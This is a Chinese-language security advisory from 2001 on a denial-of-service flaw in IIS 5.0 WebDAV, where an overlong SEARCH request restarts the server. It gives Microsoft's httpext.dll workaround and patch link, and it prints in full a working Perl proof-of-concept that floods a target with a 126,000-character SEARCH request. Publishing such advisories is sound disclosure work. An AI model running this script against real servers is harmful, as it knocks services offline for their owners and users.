|
發布日期:2001-03-20 更新日期:2001-03-20 受影響系統: 描述: WebDAV是HTTP協議的擴展,允許從遠程來編寫和管理Web內容。微軟IIS 5.0的WebDAV在 處理某些畸形的請求時存在缺陷,當提交一個超長的SEARCH請求時可以使IIS 服務重啟。 <* 來源: Georgi Guninski (guninski@GUNINSKI.COM) http://www. *> 測試方法: 警 告 Georgi Guninski (guninski@GUNINSKI.COM)提供了如下測試代碼: --vv6.pl------------------------------------------------------------- #!/usr/bin/perl use IO::Socket; printf "IIS 5.0 SEARCH\nWritten by Georgi Guninski wait some time\n"; if(@ARGV < 2) { die "\nUsage: IIS5host port \n"; } $port = @ARGV[1]; $host = @ARGV[0]; sub vv() { $ll=$_[0]; #length of buffer $ch=$_[1]; $socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return; $over=$ch x $ll; #string to overflow $xml=‘<?xml version="1.0"?><D:searchrequest xmlns:D="DAV:"><D:sql>SELECT DAV:displayname from SCOPE("‘.$over.‘")</D:sql></D:searchrequest>‘."\n"; $l=length($xml); $req="SEARCH / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n"; syswrite($socket,$req,length($req)); print "."; $socket->read($res,3000); print "r=".$res; close $socket; } do vv(126000,"V"); sleep(1); do vv(126000,"V"); #Try 125000 - 128000 --------------------------------------------------------------- 建議: 臨時解決方法: 微軟給出一個禁止WebDAV的臨時解決辦法(http://www.microsoft.com/technet/support/kb.asp?ID=241520): 1、先停止IIS服務。可以在命令行下敲“IISRESET /STOP”命令。 2、禁止everyone訪問Httpext.dll: CACLS %SystemRoot%\System32\Inetsrv\httpext.dll /D Everyone 3、再啟動IIS服務:IISRESET /START 廠商補丁: 微軟已經為此發布了一個安全公告(MS-016): http://www.microsoft.com/technet/security/bulletin/MS01-016.asp 補丁程序(目前只有英文版): Microsoft IIS 5.0: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=28564 |
|
|
